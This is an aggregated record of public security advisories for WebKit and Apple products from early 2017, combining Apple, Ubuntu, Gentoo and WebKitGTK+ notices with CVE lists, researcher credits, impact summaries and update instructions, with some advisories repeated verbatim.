http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7592
[ 16 ] CVE-2016-7598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7598
[ 17 ] CVE-2016-7599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7599
[ 18 ] CVE-2016-7610
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7610
[ 19 ] CVE-2016-7611
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7611
[ 20 ] CVE-2016-7623
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7623
[ 21 ] CVE-2016-7632
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7632
[ 22 ] CVE-2016-7635
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7635
[ 23 ] CVE-2016-7639
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7639
[ 24 ] CVE-2016-7640
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7640
[ 25 ] CVE-2016-7641
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7641
[ 26 ] CVE-2016-7642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7642
[ 27 ] CVE-2016-7645
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7645
[ 28 ] CVE-2016-7646
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7646
[ 29 ] CVE-2016-7648
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7648
[ 30 ] CVE-2016-7649
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7649
[ 31 ] CVE-2016-7652
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7652
[ 32 ] CVE-2016-7654
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7654
[ 33 ] CVE-2016-7656
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7656
[ 34 ] CVE-2016-9642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9642
[ 35 ] CVE-2016-9643
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9643
[ 36 ] CVE-2017-2350
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2350
[ 37 ] CVE-2017-2354
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2354
[ 38 ] CVE-2017-2355
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2355
[ 39 ] CVE-2017-2356
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2356
[ 40 ] CVE-2017-2362
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2362
[ 41 ] CVE-2017-2363
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2363
[ 42 ] CVE-2017-2364
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2364
[ 43 ] CVE-2017-2365
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2365
[ 44 ] CVE-2017-2366
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2366
[ 45 ] CVE-2017-2367
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2367
[ 46 ] CVE-2017-2369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2369
[ 47 ] CVE-2017-2371
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2371
[ 48 ] CVE-2017-2373
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2373
[ 49 ] CVE-2017-2376
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2376
[ 50 ] CVE-2017-2377
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2377
[ 51 ] CVE-2017-2386
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2386
[ 52 ] CVE-2017-2392
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2392
[ 53 ] CVE-2017-2394
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2394
[ 54 ] CVE-2017-2395
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2395
[ 55 ] CVE-2017-2396
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2396
[ 56 ] CVE-2017-2405
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2405
[ 57 ] CVE-2017-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2415
[ 58 ] CVE-2017-2419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2419
[ 59 ] CVE-2017-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2433
[ 60 ] CVE-2017-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2442
[ 61 ] CVE-2017-2445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2445
[ 62 ] CVE-2017-2446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2446
[ 63 ] CVE-2017-2447
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2447
[ 64 ] CVE-2017-2454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2454
[ 65 ] CVE-2017-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2455
[ 66 ] CVE-2017-2457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2457
[ 67 ] CVE-2017-2459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2459
[ 68 ] CVE-2017-2460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2460
[ 69 ] CVE-2017-2464
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2464
[ 70 ] CVE-2017-2465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2465
[ 71 ] CVE-2017-2466
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2466
[ 72 ] CVE-2017-2468
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2468
[ 73 ] CVE-2017-2469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2469
[ 74 ] CVE-2017-2470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2470
[ 75 ] CVE-2017-2471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2471
[ 76 ] CVE-2017-2475
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2475
[ 77 ] CVE-2017-2476
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2476
[ 78 ] CVE-2017-2481
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2481
[ 79 ] CVE-2017-2496
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2496
[ 80 ] CVE-2017-2504
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2504
[ 81 ] CVE-2017-2505
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2505
[ 82 ] CVE-2017-2506
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2506
[ 83 ] CVE-2017-2508
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2508
[ 84 ] CVE-2017-2510
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2510
[ 85 ] CVE-2017-2514
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2514
[ 86 ] CVE-2017-2515
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2515
[ 87 ] CVE-2017-2521
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2521
[ 88 ] CVE-2017-2525
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2525
[ 89 ] CVE-2017-2526
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2526
[ 90 ] CVE-2017-2528
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2528
[ 91 ] CVE-2017-2530
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2530
[ 92 ] CVE-2017-2531
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2531
[ 93 ] CVE-2017-2536
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2536
[ 94 ] CVE-2017-2539
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2539
[ 95 ] CVE-2017-2544
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2544
[ 96 ] CVE-2017-2547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2547
[ 97 ] CVE-2017-2549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2549
[ 98 ] CVE-2017-6980
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-6980
[ 99 ] CVE-2017-6984
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-6984
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201706-15
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2017 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
--NcNxMnppmhackEL27c23XhPLDAAQ7GQcq--
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
APPLE-SA-2017-01-23-1 iOS 10.2.1
iOS 10.2.1 is now available and addresses the following:
Auto Unlock
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Auto Unlock may unlock when Apple Watch is off the user's
wrist
Description: A logic issue was addressed through improved state
management.
CVE-2017-2352: Ashley Fernandez of raptAware Pty Ltd
Contacts
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing a maliciously crafted contact card may lead to
unexpected application termination
Description: An input validation issue existed in the parsing of
contact cards.
CVE-2017-2368: Vincent Desmurs (vincedes3)
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2017-2370: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed through improved
memory management.
CVE-2017-2360: Ian Beer of Google Project Zero
libarchive
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Unpacking a maliciously crafted archive may lead to arbitrary
code execution
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2016-8687: Agostino Sarubbo of Gentoo
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A prototype access issue was addressed through improved
exception handling.
CVE-2017-2354: Neymar of Tencent's Xuanwu Lab (tencent.com) working
with Trend Micro's Zero Day Initiative
CVE-2017-2362: Ivan Fratric of Google Project Zero
CVE-2017-2373: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory initialization issue was addressed through
improved memory handling.
CVE-2017-2356: Team Pangu and lokihardt at PwnFest 2016
CVE-2017-2366: Kai Kang of Tencent's Xuanwu Lab (tencent.com)
CVE-2017-2369: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: Multiple validation issues existed in the handling of
page loading.
CVE-2017-2363: lokihardt of Google Project Zero
CVE-2017-2364: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: A malicious website can open popups
Description: An issue existed in the handling of blocking popups.
CVE-2017-2371: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A validation issue existed in variable handling.
CVE-2017-2365: lokihardt of Google Project Zero
WiFi
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An activation-locked device can be manipulated to briefly
present the home screen
Description: An issue existed with handling user input that caused a
device to present the home screen even when activation locked.
CVE-2017-2351: Sriram (@Sri_Hxor) of Primefort Pvt. Ltd., Hemanth
Joseph
Additional recognition
WebKit hardening
We would like to acknowledge Ben Gras, Kaveh Razavi, Erik Bosman,
Herbert Bos, and Cristiano Giuffrida of the vusec group at
Vrije Universiteit Amsterdam for their assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About.
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJYgqLhAAoJEIOj74w0bLRGLBMP/2hLYLM6/FsH/npzPbCouZ3a
7WrIax5GAURyvKmeSHYwbZCyDa+U8RoR83xnm25QxVA0SYiqxYQTLavKkdiwL5dL
QJHtbltb3BWF0ctkcN4q9dvA13kapdn7zr1Zp3MyvnqlsIuo5acsl8DwgNapxklP
6NNgLFuUUPDITMRX+CZlndS3ldas9nWBHGUw7FfVQd7+SCj8+u6CBpVm03SPjC4E
9rObbrDg6Ur7RW8sYz5TvfQ+JfL8ZJQgjCNLE99AV5n+y1SzUaW5+WgklmJzwabm
P6VFCFI3qMctmiHDFh5Ab9eFCspL1ppl8gCj2+eqxCdi9cVPdiOxGUJXkfzUvLCq
d68lHHSasRjoVMacMz9ttpR7IAQpM4L9KYgJ/AbwvOFKn5MkxAJYpbU2DDnlg4UY
ZyZ8CqmIfZoEgDFSx4+LcfNeMoB0f0eDClXzCZkLMqyc7ZhRWcDPO7UTXl2l5IN9
1BoOZJ4AB6unI9/JmTz9x1mkfOMatsz3Mlw2aoqfYqhBYH4IMruIoIx9L7VawxY9
IZM1fJhEc1PejgZ48X95suaGm3LHzSqXo9gIcJ42SEevqFaoD96I5S+D1eeBOIe7
yvyQ8APU6W3io9vlfQG7oW+mtHg0uPJY6yLj+79NpvAeVHrFHi1Am+A/4uuEZLjZ
toC5axX5Dn1ZXgiVJb2H
=6bnQ
-----END PGP SIGNATURE-----
.
===========================================================================
Ubuntu Security Notice USN-3200-1
February 16, 2017
webkit2gtk vulnerabilities
===========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.10
- Ubuntu 16.04 LTS
Summary:
Several security issues were fixed in WebKitGTK+.
Software Description:
- webkit2gtk: Web content engine library for GTK+
Details:
A large number of security issues were discovered in the WebKitGTK+ Web and
JavaScript engines.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 16.10:
libjavascriptcoregtk-4.0-18 2.14.5-0ubuntu0.16.10.1
libwebkit2gtk-4.0-37 2.14.5-0ubuntu0.16.10.1
Ubuntu 16.04 LTS:
libjavascriptcoregtk-4.0-18 2.14.5-0ubuntu0.16.04.1
libwebkit2gtk-4.0-37 2.14.5-0ubuntu0.16.04.1
This update uses a new upstream release, which includes additional bug
fixes. After a standard system update you need to restart any applications
that use WebKitGTK+, such as Epiphany, to make all the necessary changes.
References:
http://www.ubuntu.com/usn/usn-3200-1
CVE-2017-2350, CVE-2017-2354, CVE-2017-2355, CVE-2017-2356,
CVE-2017-2362, CVE-2017-2363, CVE-2017-2364, CVE-2017-2365,
CVE-2017-2366, CVE-2017-2369, CVE-2017-2371, CVE-2017-2373
Package Information:
https://launchpad.net/ubuntu/+source/webkit2gtk/2.14.5-0ubuntu0.16.10.1
https://launchpad.net/ubuntu/+source/webkit2gtk/2.14.5-0ubuntu0.16.04.1
| VAR-201702-0869 | CVE-2017-2355 | plural Apple Used in products WebKit Vulnerable to arbitrary code execution |
CVSS V2: 6.8 CVSS V3: 8.8 Severity: HIGH |
An issue was discovered in certain Apple products. iOS before 10.2.1 is affected. Safari before 10.0.3 is affected. iCloud before 6.1.1 is affected. iTunes before 12.5.5 is affected. tvOS before 10.1.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access and application crash) via a crafted web site. WebKit is prone to multiple memory-corruption vulnerabilities.
Attackers can exploit this issue to execute arbitrary code on the affected system. Failed exploit attempts may result in a denial-of-service condition. Apple iOS, iCloud for Windows, iTunes for Windows, Safari, and tvOS are all products of the American company Apple (Apple). Apple iOS is an operating system developed for mobile devices; Safari is a web browser that comes with the Mac OS X and iOS operating systems by default. WebKit is an open source web browser engine developed by the KDE community and is currently used by browsers such as Apple Safari and Google Chrome. A memory corruption vulnerability exists in the WebKit component of several Apple products. The following products and versions are affected: Apple iOS prior to 10.2.1, iCloud on Windows prior to 6.1.1, iTunes prior to 12.5.5 on Windows, Safari prior to 10.0.3, tvOS 10.1 Versions prior to .1.
Safari 10.0.3 may be obtained from the Mac App Store. ------------------------------------------------------------------------
WebKitGTK+ Security Advisory WSA-2017-0002
------------------------------------------------------------------------
Date reported : February 10, 2017
Advisory ID : WSA-2017-0002
Advisory URL : https://webkitgtk.org/security/WSA-2017-0002.html
CVE identifiers : CVE-2017-2350, CVE-2017-2354, CVE-2017-2355,
CVE-2017-2356, CVE-2017-2362, CVE-2017-2363,
CVE-2017-2364, CVE-2017-2365, CVE-2017-2366,
CVE-2017-2369, CVE-2017-2371, CVE-2017-2373.
Several vulnerabilities were discovered in WebKitGTK+.
Credit to Gareth Heyes of Portswigger Web Security.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: A prototype access issue was
addressed through improved exception handling.
Credit to Neymar of Tencent's Xuanwu Lab (tencent.com) working with
Trend Micro's Zero Day Initiative. Description: Multiple memory corruption
issues were addressed through improved memory handling.
Credit to Team Pangu and lokihardt at PwnFest 2016. Description: A memory initialization issue
was addressed through improved memory handling.
Credit to Team Pangu and lokihardt at PwnFest 2016. Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed through improved memory handling.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: Multiple validation issues existed
in the handling of page loading. This issue was addressed through
improved logic.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: Multiple validation issues existed
in the handling of page loading. This issue was addressed through
improved logic.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: A validation issue existed in
variable handling. This issue was addressed through improved
validation.
Credit to Kai Kang of Tencent's Xuanwu Lab (tencent.com). Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to lokihardt of Google Project Zero.
Impact: A malicious website can open popups. Description: An issue
existed in the handling of blocking popups. This was addressed
through improved input validation.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed through improved memory handling.
We recommend updating to the last stable version of WebKitGTK+. It is
the best way of ensuring that you are running a safe version of
WebKitGTK+. Please check our website for information about the last
stable releases.
Further information about WebKitGTK+ Security Advisories can be found
at: https://webkitgtk.org/security.html
The WebKitGTK+ team,
February 10, 2017
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
APPLE-SA-2017-01-23-1 iOS 10.2.1
iOS 10.2.1 is now available and addresses the following:
Auto Unlock
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Auto Unlock may unlock when Apple Watch is off the user's
wrist
Description: A logic issue was addressed through improved state
management.
CVE-2017-2352: Ashley Fernandez of raptAware Pty Ltd
Contacts
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing a maliciously crafted contact card may lead to
unexpected application termination
Description: An input validation issue existed in the parsing of
contact cards.
CVE-2017-2368: Vincent Desmurs (vincedes3)
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2017-2370: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed through improved
memory management.
CVE-2017-2360: Ian Beer of Google Project Zero
libarchive
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Unpacking a maliciously crafted archive may lead to arbitrary
code execution
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2016-8687: Agostino Sarubbo of Gentoo
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A prototype access issue was addressed through improved
exception handling.
CVE-2017-2354: Neymar of Tencent's Xuanwu Lab (tencent.com) working
with Trend Micro's Zero Day Initiative
CVE-2017-2362: Ivan Fratric of Google Project Zero
CVE-2017-2373: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory initialization issue was addressed through
improved memory handling.
CVE-2017-2356: Team Pangu and lokihardt at PwnFest 2016
CVE-2017-2366: Kai Kang of Tencent's Xuanwu Lab (tencent.com)
CVE-2017-2369: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: Multiple validation issues existed in the handling of
page loading.
CVE-2017-2363: lokihardt of Google Project Zero
CVE-2017-2364: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: A malicious website can open popups
Description: An issue existed in the handling of blocking popups.
CVE-2017-2371: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A validation issue existed in variable handling.
CVE-2017-2365: lokihardt of Google Project Zero
WiFi
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An activation-locked device can be manipulated to briefly
present the home screen
Description: An issue existed with handling user input that caused a
device to present the home screen even when activation locked.
CVE-2017-2351: Sriram (@Sri_Hxor) of Primefort Pvt. Ltd., Hemanth
Joseph
Additional recognition
WebKit hardening
We would like to acknowledge Ben Gras, Kaveh Razavi, Erik Bosman,
Herbert Bos, and Cristiano Giuffrida of the vusec group at
Vrije Universiteit Amsterdam for their assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About.
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJYgqLhAAoJEIOj74w0bLRGLBMP/2hLYLM6/FsH/npzPbCouZ3a
7WrIax5GAURyvKmeSHYwbZCyDa+U8RoR83xnm25QxVA0SYiqxYQTLavKkdiwL5dL
QJHtbltb3BWF0ctkcN4q9dvA13kapdn7zr1Zp3MyvnqlsIuo5acsl8DwgNapxklP
6NNgLFuUUPDITMRX+CZlndS3ldas9nWBHGUw7FfVQd7+SCj8+u6CBpVm03SPjC4E
9rObbrDg6Ur7RW8sYz5TvfQ+JfL8ZJQgjCNLE99AV5n+y1SzUaW5+WgklmJzwabm
P6VFCFI3qMctmiHDFh5Ab9eFCspL1ppl8gCj2+eqxCdi9cVPdiOxGUJXkfzUvLCq
d68lHHSasRjoVMacMz9ttpR7IAQpM4L9KYgJ/AbwvOFKn5MkxAJYpbU2DDnlg4UY
ZyZ8CqmIfZoEgDFSx4+LcfNeMoB0f0eDClXzCZkLMqyc7ZhRWcDPO7UTXl2l5IN9
1BoOZJ4AB6unI9/JmTz9x1mkfOMatsz3Mlw2aoqfYqhBYH4IMruIoIx9L7VawxY9
IZM1fJhEc1PejgZ48X95suaGm3LHzSqXo9gIcJ42SEevqFaoD96I5S+D1eeBOIe7
yvyQ8APU6W3io9vlfQG7oW+mtHg0uPJY6yLj+79NpvAeVHrFHi1Am+A/4uuEZLjZ
toC5axX5Dn1ZXgiVJb2H
=6bnQ
-----END PGP SIGNATURE-----
.
===========================================================================
Ubuntu Security Notice USN-3200-1
February 16, 2017
webkit2gtk vulnerabilities
===========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.10
- Ubuntu 16.04 LTS
Summary:
Several security issues were fixed in WebKitGTK+.
Software Description:
- webkit2gtk: Web content engine library for GTK+
Details:
A large number of security issues were discovered in the WebKitGTK+ Web and
JavaScript engines.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 16.10:
libjavascriptcoregtk-4.0-18 2.14.5-0ubuntu0.16.10.1
libwebkit2gtk-4.0-37 2.14.5-0ubuntu0.16.10.1
Ubuntu 16.04 LTS:
libjavascriptcoregtk-4.0-18 2.14.5-0ubuntu0.16.04.1
libwebkit2gtk-4.0-37 2.14.5-0ubuntu0.16.04.1
This update uses a new upstream release, which includes additional bug
fixes. After a standard system update you need to restart any applications
that use WebKitGTK+, such as Epiphany, to make all the necessary changes.
References:
http://www.ubuntu.com/usn/usn-3200-1
CVE-2017-2350, CVE-2017-2354, CVE-2017-2355, CVE-2017-2356,
CVE-2017-2362, CVE-2017-2363, CVE-2017-2364, CVE-2017-2365,
CVE-2017-2366, CVE-2017-2369, CVE-2017-2371, CVE-2017-2373
Package Information:
https://launchpad.net/ubuntu/+source/webkit2gtk/2.14.5-0ubuntu0.16.10.1
https://launchpad.net/ubuntu/+source/webkit2gtk/2.14.5-0ubuntu0.16.04.1
| VAR-201702-0870 | CVE-2017-2356 | plural Apple Used in products WebKit Vulnerable to arbitrary code execution |
CVSS V2: 6.8 CVSS V3: 8.8 Severity: HIGH |
An issue was discovered in certain Apple products. iOS before 10.2.1 is affected. Safari before 10.0.3 is affected. iCloud before 6.1.1 is affected. iTunes before 12.5.5 is affected. tvOS before 10.1.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. WebKit is prone to multiple memory-corruption vulnerabilities.
Attackers can exploit this issue to execute arbitrary code on the affected system. Failed exploit attempts may result in a denial-of-service condition. Apple iOS, iCloud for Windows, iTunes for Windows, Safari, and tvOS are all products of the American company Apple (Apple). Apple iOS is an operating system developed for mobile devices; Safari is a web browser that comes with the Mac OS X and iOS operating systems by default. WebKit is an open source web browser engine developed by the KDE community and is currently used by browsers such as Apple Safari and Google Chrome. A memory corruption vulnerability exists in the WebKit component of several Apple products. The following products and versions are affected: Apple iOS prior to 10.2.1, iCloud on Windows prior to 6.1.1, iTunes prior to 12.5.5 on Windows, Safari prior to 10.0.3, tvOS 10.1 Versions prior to .1.
Safari 10.0.3 may be obtained from the Mac App Store. ------------------------------------------------------------------------
WebKitGTK+ Security Advisory WSA-2017-0002
------------------------------------------------------------------------
Date reported : February 10, 2017
Advisory ID : WSA-2017-0002
Advisory URL : https://webkitgtk.org/security/WSA-2017-0002.html
CVE identifiers : CVE-2017-2350, CVE-2017-2354, CVE-2017-2355,
CVE-2017-2356, CVE-2017-2362, CVE-2017-2363,
CVE-2017-2364, CVE-2017-2365, CVE-2017-2366,
CVE-2017-2369, CVE-2017-2371, CVE-2017-2373.
Several vulnerabilities were discovered in WebKitGTK+.
Credit to Gareth Heyes of Portswigger Web Security.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: A prototype access issue was
addressed through improved exception handling.
Credit to Neymar of Tencent's Xuanwu Lab (tencent.com) working with
Trend Micro's Zero Day Initiative. Description: Multiple memory corruption
issues were addressed through improved memory handling.
Credit to Team Pangu and lokihardt at PwnFest 2016. Description: A memory initialization issue
was addressed through improved memory handling.
Credit to Team Pangu and lokihardt at PwnFest 2016. Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed through improved memory handling.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: Multiple validation issues existed
in the handling of page loading. This issue was addressed through
improved logic.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
